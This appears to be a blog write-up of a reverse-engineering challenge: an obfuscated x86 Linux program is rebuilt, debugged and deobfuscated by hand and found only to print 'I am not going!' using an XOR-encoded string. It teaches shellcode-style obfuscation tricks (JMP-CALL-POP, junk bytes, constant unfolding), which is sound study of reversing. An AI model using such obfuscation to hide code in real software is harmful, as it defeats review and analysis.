 804808c:   eb 09                   jmp    0x8048097
 804808e:   31 db                   xor    ebx,ebx
 8048090:   31 c9                   xor    ecx,ecx
 8048092:   89 ca                   mov    edx,ecx
 8048094:   ff 24 24                jmp    DWORD PTR [esp]
 8048097:   eb 05                   jmp    0x804809e
 8048099:   8d 4d e5                lea    ecx,[ebp-0x1b]
 804809c:   b2 0c                   mov    dl,0xc
 804809e:   31 c0                   xor    eax,eax
 80480a0:   b0 08                   mov    al,0x8
 80480a2:   bb 04 00 00 00          mov    ebx,0x4
 80480a7:   29 d8                   sub    eax,ebx
 80480a9:   29 c3                   sub    ebx,eax
 80480ab:   43                      inc    ebx
 80480ac:   cd 80                   int    0x80
 80480ae:   31 c0                   xor    eax,eax
 80480b0:   31 db                   xor    ebx,ebx
 80480b2:   fe c0                   inc    al
 80480b4:   cd 80                   int    0x80
 80480b6:   e8 ae ff ff ff          call   0x8048069
 80480bb:   ed                      in     eax,dx
 80480bc:   4e                      dec    esi
 80480bd:   65 23 2a                and    ebp,DWORD PTR gs:[edx]
 80480c0:   2d 2b 23 64 30          sub    eax,0x3064232b
 80480c5:   2b 2a                   sub    ebp,DWORD PTR [edx]
 80480c7:   64 29 25 64 0d 4e 65    sub    DWORD PTR fs:0x654e0d64,esp
 80480ce:   23 2a                   and    ebp,DWORD PTR [edx]
 80480d0:   2d 2b 23 64 29          sub    eax,0x2964232b
 80480d5:   25 64 0d ee 89          and    eax,0x89ee0d64
 80480da:   89 c5                   mov    ebp,eax
 80480dc:   b0 c9                   mov    al,0xc9
 80480de:   01 f8                   add    eax,edi
 80480e0:   eb 1f                   jmp    0x8048101
 80480e2:   8d 55 00                lea    edx,[ebp+0x0]
 80480e5:   88 0c 24                mov    BYTE PTR [esp],cl
 80480e8:   4c                      dec    esp
 80480e9:   68 e9 80 04 08          push   0x80480e9
 80480ee:   85 d2                   test   edx,edx
 80480f0:   38 02                   cmp    BYTE PTR [edx],al
 80480f2:   0f 84 78 ff ff ff       je     0x8048070
 80480f8:   89 fb                   mov    ebx,edi
 80480fa:   83 c3 1f                add    ebx,0x1f
 80480fd:   30 1a                   xor    BYTE PTR [edx],bl
 80480ff:   4a                      dec    edx
 8048100:   c3                      ret    
 8048101:   31 ed                   xor    ebp,ebp
 8048103:   31 c9                   xor    ecx,ecx
 8048105:   31 d2                   xor    edx,edx
 8048107:   42                      inc    edx
 8048108:   8d 2c 0c                lea    ebp,[esp+ecx*1]
 804810b:   8a 0c 16                mov    cl,BYTE PTR [esi+edx*1]
 804810e:   38 c1                   cmp    cl,al
 8048110:   74 d0                   je     0x80480e2
 8048112:   88 0c 24                mov    BYTE PTR [esp],cl
 8048115:   83 ec 01                sub    esp,0x1
 8048118:   42                      inc    edx
 8048119:   89 e4                   mov    esp,esp
 804811b:   83 f9 00                cmp    ecx,0x0
 804811e:   7f eb                   jg     0x804810b
 8048120:   89 ed                   mov    ebp,ebp
 8048122:   c3                      ret

The challenge is to figure out whether or not the author is going based solely on this static disassembly.

Method 1: The Easy Way

In this method we'll rebuild the application and simply run it to get the answer.

The first step is to copy the instruction into a new nasm file, if we do that we get:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
global _start

section .text

_start:
    mov    edx,eax
    mov    edi,0x25
    jmp    0x80480b6
    mov    bl,0x32
    pop    esi
    xor    eax,eax
    je     0x80480dc
    mov    bh,0x6a
    call   0x804808e
    mov    cl,0x4
    mov    al,BYTE PTR [esi]
    sub    esp,ecx
    inc    ecx
    xor    al,cl
    xor    ecx,ecx
    cmp    eax,0x4
    je     0x8048099
    lea    ecx,[ebp-0xf]
    mov    dl,0x10
    jmp    0x8048097
    xor    ebx,ebx
    xor    ecx,ecx
    mov    edx,ecx
    jmp    DWORD PTR [esp]
    jmp    0x804809e
    lea    ecx,[ebp-0x1b]
    mov    dl,0xc
    xor    eax,eax
    mov    al,0x8
    mov    ebx,0x4
    sub    eax,ebx
    sub    ebx,eax
    inc    ebx
    int    0x80
    xor    eax,eax
    xor    ebx,ebx
    inc    al
    int    0x80
    call   0x8048069
    in     eax,dx
    dec    esi
    and    ebp,DWORD PTR gs:[edx]
    sub    eax,0x3064232b
    sub    ebp,DWORD PTR [edx]
    sub    DWORD PTR fs:0x654e0d64,esp
    and    ebp,DWORD PTR [edx]
    sub    eax,0x2964232b
    and    eax,0x89ee0d64
    mov    ebp,eax
    mov    al,0xc9
    add    eax,edi
    jmp    0x8048101
    lea    edx,[ebp+0x0]
    mov    BYTE PTR [esp],cl
    dec    esp
    push   0x80480e9
    test   edx,edx
    cmp    BYTE PTR [edx],al
    je     0x8048070
    mov    ebx,edi
    add    ebx,0x1f
    xor    BYTE PTR [edx],bl
    dec    edx
    ret    
    xor    ebp,ebp
    xor    ecx,ecx
    xor    edx,edx
    inc    edx
    lea    ebp,[esp+ecx*1]
    mov    cl,BYTE PTR [esi+edx*1]
    cmp    cl,al
    je     0x80480e2
    mov    BYTE PTR [esp],cl
    sub    esp,0x1
    inc    edx
    mov    esp,esp
    cmp    ecx,0x0
    jg     0x804810b
    mov    ebp,ebp
    ret

When we try to assemble this we get:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
root@dev:~# nasm -felf32 -o going-or-not-obf-test1 going-or-not-obf-test1.nasm going-or-not-obf-test1.nasm:16: error: comma, colon or end of line expected
going-or-not-obf-test1.nasm:29: error: comma, colon or end of line expected
going-or-not-obf-test1.nasm:47: error: comma, colon or end of line expected
going-or-not-obf-test1.nasm:49: error: comma, colon or end of line expected
going-or-not-obf-test1.nasm:50: error: comma, colon or end of line expected
going-or-not-obf-test1.nasm:51: error: comma, colon or end of line expected
going-or-not-obf-test1.nasm:59: error: comma, colon or end of line expected
going-or-not-obf-test1.nasm:63: error: comma, colon or end of line expected
going-or-not-obf-test1.nasm:67: error: comma, colon or end of line expected
going-or-not-obf-test1.nasm:75: error: comma, colon or end of line expected
going-or-not-obf-test1.nasm:78: error: comma, colon or end of line expected

Looking at the lines that have caused the errors:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
root@dev:~# for i in 16 29 47 49 50 51 59 63 67 75 78; do cat -n going-or-not-obf-test1.nasm | grep "^[ ]*$i"; done
    16      mov    al,BYTE PTR [esi]
    29      jmp    DWORD PTR [esp]
    47      and    ebp,DWORD PTR gs:[edx]
    49      sub    ebp,DWORD PTR [edx]
    50      sub    DWORD PTR fs:0x654e0d64,esp
    51      and    ebp,DWORD PTR [edx]
    59      mov    BYTE PTR [esp],cl
    63      cmp    BYTE PTR [edx],al
    67      xor    BYTE PTR [edx],bl
    75      mov    cl,BYTE PTR [esi+edx*1]
    78      mov    BYTE PTR [esp],cl

You can see that its all lines that have [SIZE] PTR, we will remove any DWORD PTR and BYTE PTR and for the lines that had BYTE put that before the first operand, so they end up like this:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
root@dev:~# for i in 16 29 47 49 50 51 59 63 67 75 78; do cat -n going-or-not-obf-test2.nasm | grep "^[ ]*$i"; done
    16      mov    BYTE al, [esi]
    29      jmp    [esp]
    47      and    ebp, gs:[edx]
    49      sub    ebp, [edx]
    50      sub    fs:0x654e0d64,esp
    51      and    ebp, [edx]
    59      mov    BYTE [esp],cl
    63      cmp    BYTE [edx],al
    67      xor    BYTE [edx],bl
    75      mov    BYTE cl,[esi+edx*1]
    78      mov    BYTE [esp],cl

Now we try to assemble it again:

1
2
3
root@dev:~# nasm -felf32 -o going-or-not-obf-test2 going-or-not-obf-test2.nasm  
going-or-not-obf-test2.nasm:47: error: invalid combination of opcode and operands
going-or-not-obf-test2.nasm:50: error: invalid combination of opcode and operands

So there is still a problem with 2 lines, it looks as if these instructions are invalid, this could possibly be data, what we shall do is replace these 2 instructions with the raw opcodes from the disassembly, so our application ends up like this:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
global _start

section .text

_start:
    mov    edx,eax
    mov    edi,0x25
    jmp    0x80480b6
    mov    bl,0x32
    pop    esi
    xor    eax,eax
    je     0x80480dc
    mov    bh,0x6a
    call   0x804808e
    mov    cl,0x4
    mov    BYTE al, [esi]
    sub    esp,ecx
    inc    ecx
    xor    al,cl
    xor    ecx,ecx
    cmp    eax,0x4
    je     0x8048099
    lea    ecx,[ebp-0xf]
    mov    dl,0x10
    jmp    0x8048097
    xor    ebx,ebx
    xor    ecx,ecx
    mov    edx,ecx
    jmp    [esp]
    jmp    0x804809e
    lea    ecx,[ebp-0x1b]
    mov    dl,0xc
    xor    eax,eax
    mov    al,0x8
    mov    ebx,0x4
    sub    eax,ebx
    sub    ebx,eax
    inc    ebx
    int    0x80
    xor    eax,eax
    xor    ebx,ebx
    inc    al
    int    0x80
    call   0x8048069
    in     eax,dx
    dec    esi
    db 0x65,0x23,0x2a
    sub    eax,0x3064232b
    sub    ebp, [edx]
    db 0x64,0x29,0x25,0x64,0x0d,0x4e,0x65
    and    ebp, [edx]
    sub    eax,0x2964232b
    and    eax,0x89ee0d64
    mov    ebp,eax
    mov    al,0xc9
    add    eax,edi
    jmp    0x8048101
    lea    edx,[ebp+0x0]
    mov    BYTE [esp],cl
    dec    esp
    push   0x80480e9
    test   edx,edx
    cmp    BYTE [edx],al
    je     0x8048070
    mov    ebx,edi
    add    ebx,0x1f
    xor    BYTE [edx],bl
    dec    edx
    ret    
    xor    ebp,ebp
    xor    ecx,ecx
    xor    edx,edx
    inc    edx
    lea    ebp,[esp+ecx*1]
    mov    BYTE cl,[esi+edx*1]
    cmp    cl,al
    je     0x80480e2
    mov    BYTE [esp],cl
    sub    esp,0x1
    inc    edx
    mov    esp,esp
    cmp    ecx,0x0
    jg     0x804810b
    mov    ebp,ebp
    ret

If we assemble this and test it out:

1
2
3
4
root@dev:~# nasm -felf32 -o going-or-not-obf-test3.o going-or-not-obf-test3.nasm 
root@dev:~# ld -o going-or-not-obf-test3 going-or-not-obf-test3.o
root@dev:~# ./going-or-not-obf-test3
Segmentation fault

So it assembles and links now but we get a segmentation fault. Let's investigate why:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
root@dev:~# gdb -q ./going-or-not-obf-test3
Reading symbols from /root/going-or-not-obf-test3...(no debugging symbols found)...done.
(gdb) r
Starting program: /root/going-or-not-obf-test3 

Program received signal SIGSEGV, Segmentation fault.
0x080480b6 in _start ()
(gdb) x/i $eip
=> 0x80480b6 <_start+86>:   add    BYTE PTR [eax],al
(gdb) print/x $eax
$1 = 0x0
(gdb) disassemble 
Dump of assembler code for function _start:
   0x08048060 <+0>: mov    edx,eax
   0x08048062 <+2>: mov    edi,0x25
   0x08048067 <+7>: jmp    0x80480b6 <_start+86>
   0x0804806c <+12>:    mov    bl,0x32
   0x0804806e <+14>:    pop    esi
   0x0804806f <+15>:    xor    eax,eax
   0x08048071 <+17>:    je     0x80480dc <_start+124>
   0x08048077 <+23>:    mov    bh,0x6a
   0x08048079 <+25>:    call   0x804808e <_start+46>
   0x0804807e <+30>:    mov    cl,0x4
   0x08048080 <+32>:    mov    al,BYTE PTR [esi]
   0x08048082 <+34>:    sub    esp,ecx
   0x08048084 <+36>:    inc    ecx
   0x08048085 <+37>:    xor    al,cl
   0x08048087 <+39>:    xor    ecx,ecx
   0x08048089 <+41>:    cmp    eax,0x4
   0x0804808c <+44>:    je     0x8048099 <_start+57>
   0x08048092 <+50>:    lea    ecx,[ebp-0xf]
   0x08048095 <+53>:    mov    dl,0x10
   0x08048097 <+55>:    jmp    0x8048097 <_start+55>
   0x0804809c <+60>:    xor    ebx,ebx
   0x0804809e <+62>:    xor    ecx,ecx
   0x080480a0 <+64>:    mov    edx,ecx
   0x080480a2 <+66>:    jmp    DWORD PTR [esp]
   0x080480a5 <+69>:    jmp    0x804809e <_start+62>
   0x080480aa <+74>:    lea    ecx,[ebp-0x1b]
   0x080480ad <+77>:    mov    dl,0xc
   0x080480af <+79>:    xor    eax,eax
   0x080480b1 <+81>:    mov    al,0x8
   0x080480b3 <+83>:    mov    ebx,0x4
   0x080480b8 <+88>:    sub    eax,ebx
   0x080480ba <+90>:    sub    ebx,eax
   0x080480bc <+92>:    inc    ebx
   0x080480bd <+93>:    int    0x80
   0x080480bf <+95>:    xor    eax,eax
   0x080480c1 <+97>:    xor    ebx,ebx
   0x080480c3 <+99>:    inc    al
   0x080480c5 <+101>:   int    0x80
---Type <return> to continue, or q <return> to quit---
   0x080480c7 <+103>:   call   0x8048069 <_start+9>
   0x080480cc <+108>:   in     eax,dx
   0x080480cd <+109>:   dec    esi
   0x080480ce <+110>:   and    ebp,DWORD PTR gs:[edx]
   0x080480d1 <+113>:   sub    eax,0x3064232b
   0x080480d6 <+118>:   sub    ebp,DWORD PTR [edx]
   0x080480d8 <+120>:   sub    DWORD PTR fs:0x654e0d64,esp
   0x080480df <+127>:   and    ebp,DWORD PTR [edx]
   0x080480e1 <+129>:   sub    eax,0x2964232b
   0x080480e6 <+134>:   and    eax,0x89ee0d64
   0x080480eb <+139>:   mov    ebp,eax
   0x080480ed <+141>:   mov    al,0xc9
   0x080480ef <+143>:   add    eax,edi
   0x080480f1 <+145>:   jmp    0x8048101 <_start+161>
   0x080480f6 <+150>:   lea    edx,[ebp+0x0]
   0x080480f9 <+153>:   mov    BYTE PTR [esp],cl
   0x080480fc <+156>:   dec    esp
   0x080480fd <+157>:   push   0x80480e9
   0x08048102 <+162>:   test   edx,edx
   0x08048104 <+164>:   cmp    BYTE PTR [edx],al
   0x08048106 <+166>:   je     0x8048070 <_start+16>
   0x0804810c <+172>:   mov    ebx,edi
   0x0804810e <+174>:   add    ebx,0x1f
   0x08048111 <+177>:   xor    BYTE PTR [edx],bl
   0x08048113 <+179>:   dec    edx
   0x08048114 <+180>:   ret    
   0x08048115 <+181>:   xor    ebp,ebp
   0x08048117 <+183>:   xor    ecx,ecx
   0x08048119 <+185>:   xor    edx,edx
   0x0804811b <+187>:   inc    edx
   0x0804811c <+188>:   lea    ebp,[esp+ecx*1]
   0x0804811f <+191>:   mov    cl,BYTE PTR [esi+edx*1]
   0x08048122 <+194>:   cmp    cl,al
   0x08048124 <+196>:   je     0x80480e2 <_start+130>
   0x0804812a <+202>:   mov    BYTE PTR [esp],cl
   0x0804812d <+205>:   sub    esp,0x1
   0x08048130 <+208>:   inc    edx
   0x08048131 <+209>:   mov    esp,esp
   0x08048133 <+211>:   cmp    ecx,0x0
---Type <return> to continue, or q <return> to quit---
   0x08048136 <+214>:   jg     0x804810b <_start+171>
   0x0804813c <+220>:   mov    ebp,ebp
   0x0804813e <+222>:   ret    
End of assembler dump.

So it looks as if we've landed in the middle of an instruction.

Near the start of the application (on line 16 above), it jumps it a certain memory address which is the middle of an instruction. The resulting instruction, as seen on line 9, tries to move a value to the address pointed to by the EAX register.

On line 11 you can see that the value in EAX is 0, which is what caused the segfault, 0 is an invalid memory address.

The reason for this is because the original application jumped to static memory addresses, in the application the memory addresses are different so this will need to be fixed for the application to work.

What we need to do is replace any fixed memory addresses with labels. We can find where in the application the memory addresses are meant to go by looking at the original disassembly.

Once we have done this the resulting application is as follows:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
global _start

section .text

_start:
    mov    edx,eax
    mov    edi,0x25
    jmp    One
Two:
    mov    bl,0x32
    pop    esi
    xor    eax,eax
    je     Three
Eight:
    mov    bh,0x6a
    call   Nine
    mov    cl,0x4
    mov    BYTE al, [esi]
    sub    esp,ecx
    inc    ecx
    xor    al,cl
    xor    ecx,ecx
    cmp    eax,0x4
    je     Eleven
    lea    ecx,[ebp-0xf]
    mov    dl,0x10
    jmp    Twelve
Nine:
    xor    ebx,ebx
    xor    ecx,ecx
    mov    edx,ecx
    jmp    [esp]
Twelve:
    jmp    Ten
Eleven:
    lea    ecx,[ebp-0x1b]
    mov    dl,0xc
Ten:
    xor    eax,eax
    mov    al,0x8
    mov    ebx,0x4
    sub    eax,ebx
    sub    ebx,eax
    inc    ebx
    int    0x80
    xor    eax,eax
    xor    ebx,ebx
    inc    al
    int    0x80
One:
    call   Two
    in     eax,dx
    dec    esi
    db 0x65,0x23,0x2a
    sub    eax,0x3064232b
    sub    ebp, [edx]
    db 0x64,0x29,0x25,0x64,0x0d,0x4e,0x65
    and    ebp, [edx]
    sub    eax,0x2964232b
    and    eax,0x89ee0d64
    mov    ebp,eax
Three:
    mov    al,0xc9
    add    eax,edi
    jmp    Four
Six:
    lea    edx,[ebp+0x0]
    mov    BYTE [esp],cl
    dec    esp
Seven:
    push   Seven
    test   edx,edx
    cmp    BYTE [edx],al
    je     Eight
    mov    ebx,edi
    add    ebx,0x1f
    xor    BYTE [edx],bl
    dec    edx
    ret    
Four:
    xor    ebp,ebp
    xor    ecx,ecx
    xor    edx,edx
    inc    edx
    lea    ebp,[esp+ecx*1]
Five:
    mov    BYTE cl,[esi+edx*1]
    cmp    cl,al
    je     Six
    mov    BYTE [esp],cl
    sub    esp,0x1
    inc    edx
    mov    esp,esp
    cmp    ecx,0x0
    jg     Five
    mov    ebp,ebp
    ret

There are a couple of values here (on lines 55, 59 and 60) which look like memory addresses but they aren't valid memory addresses in the original disassembly so they could just be normal values or, as its in the same section as the invalid instructions, part of some data.

With this done we can test this application:

1
2
3
4
root@dev:~# nasm -felf32 -o going-or-not-obf-test4.o going-or-not-obf-test4.nasm
root@dev:~# ld -o going-or-not-obf-test4 going-or-not-obf-test4.o
root@dev:~# ./going-or-not-obf-test4
I am not going!

So we have our answer, the author is not going :-)

Method 2: The Hard Way

Here we will attempt to understand the application and figure out what the application does without building and running it.

Although you would have needed some understanding of IA32 to do the previous method, obviously you will need a better understanding of it to do this.

The first step would be what we have already done. Well, there would be no need for the ability to assemble the application, or even have a valid nasm file but we would need to replace any known addresses with labels because this will make the disassembly significantly easier to read.

For this will we just use the nasm file above (going-or-not-obf-test4.nasm), just because it will make this post a little shorter :-)

What we do now is follow the control flow of the application and simplfy it as we go by replacing more complex sequencies with less complex 1's or even only 1 instruction in some cases and removing any dead instructions (instructions which have no effect on the application at all) altogether.

This process is manual deobfuscation and can be applied to small sections of applications instead of just full applications like the last method.

Let's start with the first instruction mov edx,eax, this looks like it is a junk line (or dead code) mainly because this is the first instruction of the application, if this was just a code segment instead of a full application this code would be more likely to be meaningful.

The second instruction mov edi,0x25, is also very difficult to quickly determine its usefulness to the application, what we need to do here is take note of the value inside the EDI register.

The next 4 instructions do something interesting, if you follow the control flow of the application and line the instructions sequentially you get:

1
2
3
4
5
6
  jmp    One
One:
  call   Two
Two:
  mov    bl,0x32
  pop    esi

So the 3rd instruction (on line 5) is not related here, and is similar to the previous mov instruction, just make a note that bl contains 0x32.

The other 3 instructions are using a technique used in some shellcode to get the an address in memory when the code might start at a different point in memory.

Its called the JMP-CALL-POP technique and gets the address of the address immediately following the call instruction into the register used in the pop instruction.

Knowing this we can replace the entire code above with:

1
2
  mov    bl,0x32
  mov    esi, One

Let's look at the next 4 instructions:

1
2
3
4
5
  xor    eax,eax
  je     Three
Three:
  mov    al,0xc9
  add    eax,edi

So here, on line 5, we use the EDI register, we zero EAX, set it to 0xc9 (201), adds it to EDI (0x25 or 37) and stores the result in EAX, this series of instructions are what is called constant unfolding where a series of instructions are done to work out the actual required value instead of just assigning the value to begin with.

We could use the opposite, a common compiler optimization constant folding, to decrease the complexity of this code, so these 4 instructions could be replaced by:

1
  mov    eax,0xee

The next 5 instructions are:

1
2
3
4
5
6
  jmp    Four
Four:
  xor    ebp,ebp
  xor    ecx,ecx
  xor    edx,edx
  inc    edx

This set of instructions just sets EBP and ECX to 0 and EDX to 1. Now its obvious that the instrction at the beginning was dead code because EDX hasn't been used at all and now it has been overwritten.

We can rewrite the application so far in a much more simplfied way:

1
2
3
4
5
6
7
8
_start:
  mov    edi,0x25
  mov    bl,0x32
  mov    esi, One
  mov    eax,0xee
  xor    ebp,ebp
  xor    ecx,ecx
  mov    edx,0x1

As you can see, this is much easier to read than the previous code that was jumping about all over the place.

I kept the assignment to EDI (on line 2) there because, although I've removed the need for it in assigning the value of EAX (on line 5), it still might be used in the future.

Also, the assignment to bl (on line 3) still might not be needed but we shall keep it there just incase.

Let's quickly review the state of the registers:

1
2
3
4
5
6
7
EDI = 0x25
BL = 0x32
ESI = (Address of One) One
EAX = 0xee
EBP = 0x0
ECX = 0x0
EDX = 0x1

The register state and code rewrite should be constantly updated as you go through the code.

The next instruction is lea ebp,[esp+ecx*1], which is the same as EBP = ESP + ECX * 1 or EBP = ESP + 0 * 1 or EBP = ESP.

After this instruction we enter the following loop:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
Five:
  mov    BYTE cl,[esi+edx*1]
  cmp    cl,al
  je     Six
  mov    BYTE [esp],cl
  sub    esp,0x1
  inc    edx
  mov    esp,esp
  cmp    ecx,0x0
  jg     Five
  mov    ebp,ebp
  ret

So this first moves a byte at ESI + EDX * 1, which is basically just ESI + EDX, into the cl register. We know at this point the value inside EDX is 1 and that ESI points to some address in the middle of the application, so our loop will start getting data 1 byte after that address.

This byte is them compared with al, which we know is 0xee, and if they are the same execution will jump to Six.

Providing the jump to Six isn't taken, the byte is moved to the top of the stack (which ESP points to), ESP is adjusted accordingly, EDX is incremented by 1 and the loop is rerun.

The mov instruction on line 8 doesn't do anything, dead code which can be removed.

Now we can find all of the data that is being worked on here:

1
4e 65 23 2a 2d 2b 23 64 30 2b 2a 64 29 25 64 0d 4e 65 23 2a 2d 2b 23 64 29 25 64 0d ee

The starting address of this data is 80480bc in the original disassembly, which is 1 byte after the address of the instruction following the call instruction in the jmp-call-pop routine at the start of the application.

It ends with the ee value because this is the point at which the jump to Six is taken.

Also, notice that nowhere here is a 0x0 (or 00) byte, this means that the jg (jump if greater than) instruction on line 10 will always be taken, every byte there is above 0 so the 2 instructions after are dead code and can be removed from the analysis and the jg can be replaced with a jmp.

It is clear that this data, which is sitting in the middle of the application, is being put on the stack for some reason, the lea instruction right before the loop just saved the address pointing to the beginning of the new location of the data on the stack into the EBP register.

We could try to figure out how meaningful this data is now but it would be best to have a look to see what the application does with it first.

Now let's take the jump to Six:

1
2
3
  lea    edx,[ebp+0x0]
  mov    BYTE [esp],cl
  dec    esp

First it loads the address of the data on the stack, currently in EBP, into EDX.

cl, which is currently 0xee, is put onto the stack and ESP is adjusted accordingly.

We then enter into the 2nd loop:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
Seven:
  push   Seven
  test   edx,edx
  cmp    BYTE [edx],al
  je     Eight
  mov    ebx,edi
  add    ebx,0x1f
  xor    BYTE [edx],bl
  dec    edx
  ret

This is a very unusual loop, you will only see this type of code when reversing obfuscated code.

It started by pushing its own address to the stack, this allows the ret on line 10 to return to Seven.

The test instruction on line 3 is dead code because all test does is set EFLAGS, but they are immediately overwritten by the cmp instruction that follows.

Lines 4 and 5 again test the value of a byte in the data, this time pointed to by EDX, against 0xee and jump's to Eight when its reached.

The next 2 instructions, lines 6 and 7, move the value from EDI into EBX and add's 0x1f to it. We already know that 0x25 is currently in EDI, so EBX = 0x25 + 0x1f or EBX = 0x44.

The byte in the data is then xor'd with bl (or 0x44) and EDX is decremented.

Clearly this is a simply xor encoding of the data, I wrote a python script a while ago to xor a number of bytes with 1 byte and output both the resulting bytes as ascii characters, and the same but with the characters reversed (due to little endian architectures), here is the script:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
#!/usr/bin/env python

import sys

string = sys.argv[1]
xor = sys.argv[2]
decoded = ""

for c in string:
    decoded += chr(ord(c) ^ ord(xor))


print "String as is:"
print decoded

print "\n\nString reversed:"
print decoded[::-1]

This script is very simple, 1 thing to bare in mind though is that, because we are dealing with data outside of the printable ascii range (0x20 - 0x7e), we can just type the characters on the command line.

So we run the script like this:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
root@dev:~# python xor-and-ascii.py $(python -c 'print "\x4e\x65\x23\x2a\x2d\x2b\x23\x64\x30\x2b\x2a\x64\x29\x25\x64\x0d\x4e\x65\x23\x2a\x2d\x2b\x23\x64\x29\x25\x64\x0d"') $(python -c 'print "\x44"')
String as is:

!gniog ton ma I
!gniog ma I


String reversed:
I am going!
I am not going!

So now we know what that data is in the middle of the application, clearly it was done like this to confuse but we have reversed enough of the application now to figure out what this is.

With this is mind, we no longer need those 2 loops, or any of the code aimed at moving and decoding the data, we can simply put it in as is.

Let's review our rewritten application:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
_start:
  mov    edi,0x25
  mov    esi,One
  mov    ebp,not+0xf
  mov    ebx,0x44
  mov    ecx,0xee
  mov    eax,ecx
  mov    edx,am
One:
  db 0xed
  am: db "I am going!",0xa
  not: db "I am not going!",0xa

I have obviously removed most of the code because it simply isn't needed now, I've made sure that EBP still points to the end of the data and EDX to the beginning just incase there is some reason for this, but most of the code so far was devoted to decoding the data which is no longer needed.

Now for the registers:

1
2
3
4
5
6
7
EDI = 0x25
EBX = 0x44
ESI = (Address of One) One
EAX = 0xee
EBP = (Address of the end of the data) not+0xf
ECX = 0xee
EDX = (Address of the beginning of the data) am

The next 5 instructions show another weird use of call and jmp:

1
2
3
4
5
6
7
8
Eight:
  mov    bh,0x6a
  call   Nine
Nine:
  xor    ebx,ebx
  xor    ecx,ecx
  mov    edx,ecx
  jmp    [esp]

Firstly there is an assignment to bh (the second 8 bits of the EBX register) but then, on line 5, the whole EBX register is cleared using xor so line 2 is dead code.

The call instruction on line 3 and the jmp instruction on line 8 seem to be used just to confuse the reverser, there is no reason for this, but bare in mind that this would have stuck 4 bytes on the stack, next to the decoded data, which hasn't been cleaned up (this could effect the application in some way).

The rest of this code just zero's out EBX, ECX and EDX.

The next 8 instructions are very interesting:

1
2
3
4
5
6
7
8
  mov    cl,0x4
  mov    BYTE al, [esi]
  sub    esp,ecx
  inc    ecx
  xor    al,cl
  xor    ecx,ecx
  cmp    eax,0x4
  je     Eleven

Lines 1 and 3 fix the value of ESP after the call, jmp sequence earlier.

The rest xor's 0x5 with the byte at One and compares the result with 0x4. We can test this out in python, we know the byte at One is 0xed, so:

1
2
3
4
5
6
7
8
root@dev:~# python
Python 2.7.3 (default, Mar 14 2014, 11:57:14) 
[GCC 4.7.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> a = "\xed"
>>> b = "\x05"
>>> hex(ord(a) ^ ord(b))
'0xe8'

This isn't equal to 0x4 so the jump on line 8 will not be taken.

The next instruction lea ecx,[ebp-0xf] loads EBP - 16 into ECX, ECX will now point to somewhere in the middle of the data (it will actually point 16 characters from the end, which is the start of the string I am not going!).

We can probably guess at what this is going to do from here but let's finish the analysis.

0x10 is then loaded into EDX and then 2 unconditional jumps are taken:

1
2
3
  jmp    Twelve
Twelve:
  jmp    Ten

The only reason for these jumps is to confuse the reverser, we can just ignore them.

The next 7 lines is a very important part of the application:

1
2
3
4
5
6
7
  xor    eax,eax
  mov    al,0x8
  mov    ebx,0x4
  sub    eax,ebx
  sub    ebx,eax
  inc    ebx
  int    0x80

So lines 1-4 set EAX to 0x4, lines 5 and 6 set EBX to 0x1 and then the interrupt *0x80 is initiated.

Interrupt 0x80 is a special interrupt which initiates a system call, the system call number has to be stored in EAX, which is 0x4 at this moment in time.

We can figure out what system call this is:

1
2
root@dev:~# grep ' 4$' /usr/include/i386-linux-gnu/asm/unistd_32.h 
#define __NR_write 4

This makes sense, the prototype for this syscall is:

1
ssize_t write(int fd, const void *buf, size_t count);

Each of the arguments go in EBX, ECX and EDX. So to write to stdout, EBX should be 1 which it is.

ECX should point to the string, which it currently points to I am not going!, and EDX should contain the number of characters to print which it does.

The last 4 instructions just run another syscall, exit, you can check this yourself if you wish:

1
2
3
4
  xor    eax,eax
  xor    ebx,ebx
  inc    al
  int    0x80

Obviously we can now wrtie this in a much simpler way, but there is no need, we know exactly what this application does and how it does it.

Improving Obfuscation

As I mentioned earlier, the obfuscation could have been done better to make the reversing process harder. I actually purposefully made the obfuscation weaker than I could have to make the challenge easier.

Inserting more junk data inbetween some instructions could make the static disassembly significantly more difficult to read and understand.

I have to actually add a byte (0x89) at the end of the data section because the next few instructions were being obfuscated in a way that made them unreadable:

1
2
3
4
5
6
 80480d5:   25 64 0d ee 89          and    eax,0x89ee0d64
 80480da:   c5 b0 c9 01 f8 eb       lds    esi,FWORD PTR [eax-0x1407fe37]
 80480e0:   1f                      pop    ds
 80480e1:   8d 55 00                lea    edx,[ebp+0x0]
 80480e4:   88 0c 24                mov    BYTE PTR [esp],cl
 80480e7:   4c                      dec    esp

The disassembly shown here has had the last byte of the data removed and is the last line of the data section; and a few lines after.

